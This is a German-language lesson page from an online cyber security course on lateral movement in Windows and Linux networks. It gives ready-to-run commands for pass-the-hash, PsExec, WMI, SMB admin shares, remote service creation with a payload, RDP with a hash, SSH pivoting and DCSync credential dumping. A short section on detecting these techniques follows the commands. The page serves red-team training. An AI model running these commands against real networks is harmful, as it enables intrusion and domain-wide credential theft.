Techniken für laterale Bewegungen
Bewegen Sie sich mit WMI, PsExec, WinRM und SMB-Freigaben durch Netzwerke, ohne Alarme auszulösen.
Techniken für laterale Bewegungen ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 3 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was ist laterale Bewegung?
Laterale Bewegung bezeichnet die Gesamtheit der Techniken, mit denen sich Angreifer nach der ersten Kompromittierung schrittweise in einem Netzwerk bewegen – vom ersten Zugriffspunkt zu wertvolleren Zielen wie Domänencontrollern, Datenbanken und Backupsystemen.
Pass-the-Hash (PtH)
Die Windows-NTLM-Authentifizierung ermöglicht die direkte Verwendung des Passwort-Hashes anstelle des Klartextpassworts. Ein Angreifer, der NTLM-Hashes ausgelesen hat, kann sich bei anderen Systemen authentifizieren, ohne den Hash zu knacken.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHPass-the-Ticket (PtT)
Kerberos-Tickets (TGT oder TGS) können aus dem Arbeitsspeicher extrahiert und importiert werden, um sich als Inhaber des Tickets zu authentifizieren. Bei Golden-Ticket-Angriffen werden TGTs mithilfe des KRBTGT-Hashes gefälscht, wodurch unbegrenzter Kerberos-Zugriff auf die Domäne ermöglicht wird.
Remote Code Execution: PSExec
psexec (Sysinternals und Impacket) führt über SMB- beziehungsweise Administratorfreigaben Befehle auf entfernten Windows-Hosts aus. Hierfür sind Administratoranmeldedaten erforderlich. Auf dem Ziel wird eine Dienstbinärdatei erstellt.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecLaterale Bewegung über WMI
Windows Management Instrumentation ermöglicht die Remote-Codeausführung, ohne Dateien zu erstellen, die von vielen Tools erkannt werden können:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB und Administratorfreigaben
Windows-Administratorfreigaben (C$, ADMIN$, IPC$) ermöglichen laterale Bewegung mit Administratoranmeldedaten:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Remote-Dienste: sc und at
Erstellen Sie Dienste oder geplante Tasks auf entfernten Systemen:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP und interaktive Sitzungen
RDP (Remote Desktop Protocol, Port 3389) bietet vollständigen interaktiven Zugriff. Angreifer verwenden RDP mit gestohlenen Anmeldedaten. Schutzmaßnahmen: Beschränken Sie RDP auf Jump-Server, verlangen Sie NLA und protokollieren Sie alle Sitzungen.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH als Mittel für laterale Bewegung
In Linux-Umgebungen ermöglicht SSH mit gestohlenen Schlüsseln oder Anmeldedaten die laterale Bewegung. Der Missbrauch von Agent Forwarding ermöglicht Pivoting über kompromittierte Hosts. SSH-Tunnel leiten Ports weiter, um ansonsten nicht zugängliche Systeme zu erreichen.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostActive-Directory-Replikation (DCSync)
DCSync missbraucht die AD-Replikation, um Passwort-Hashes direkt vom DC abzurufen, ohne Code auf dem DC auszuführen – hierfür ist das Privileg DS-Replication-Get-Changes-All erforderlich:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtLaterale Bewegung erkennen
Erkennungsindikatoren:
- Ereignis 4624 (Anmeldung) mit ungewöhnlichen Anmeldungen vom Typ 3 (Netzwerk)
- Erstellung von Diensten auf entfernten Hosts (Ereignis 7045)
- SMB-Verbindungen zwischen Workstations
- WMI-Prozesserstellung auf entfernten Hosts
- Anomales Kontoverhalten (ein Benutzer meldet sich von mehreren Rechnern an)
Schnelltest: Laterale Bewegung
Welche Technik ermöglicht es einem Angreifer, sich mit einem abgefangenen NTLM-Hash bei Windows-Systemen zu authentifizieren, ohne ihn zu knacken?
Zusammenfassung der Lektion
Laterale Bewegung nutzt kompromittierte Anmeldedaten und Protokolle, um sich im Netzwerk auszubreiten. Wichtige Techniken: Pass-the-Hash (Wiederverwendung des NTLM-Hashes), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB für die Remote-Ausführung und DCSync zur Erfassung von Domänenanmeldedaten. Erkennung: ungewöhnliche Netzwerkanmeldungen (Ereignis 4624), Erstellung entfernter Dienste (Ereignis 7045) und SMB-Datenverkehr zwischen Workstations.
Häufig gestellte Fragen
Ist die Lektion „Techniken für laterale Bewegungen“ kostenlos?
Ja — der vollständige Text von „Techniken für laterale Bewegungen“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Techniken für laterale Bewegungen“?
Bewegen Sie sich mit WMI, PsExec, WinRM und SMB-Freigaben durch Netzwerke, ohne Alarme auszulösen. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Cyber Security Academy zu starten?
Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 3 von 4.
Wie lange dauert die Lektion „Techniken für laterale Bewegungen“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?
Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- C2-Frameworks: Cobalt Strike und Sliver
- Living-off-the-Land-Binaries (LOLBins)
- Techniken für laterale Bewegungen
- Berichte für Red Teams schreiben